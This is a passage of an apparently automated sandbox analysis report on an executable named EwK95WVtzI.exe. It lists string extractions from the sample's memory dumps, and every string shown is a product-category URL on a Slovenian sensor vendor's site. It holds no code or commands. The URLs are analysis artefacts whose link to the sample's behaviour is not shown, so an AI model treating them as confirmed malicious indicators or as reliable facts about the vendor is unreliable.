EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/dodatki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/elektronika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilna-celica/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilni-pin/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/natezna-merilna-celica/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/obrocni-pretvorniki-sile/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/posebni-pretvorniki-sile/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-nagiba/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-sile-napetosti-kompresije/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 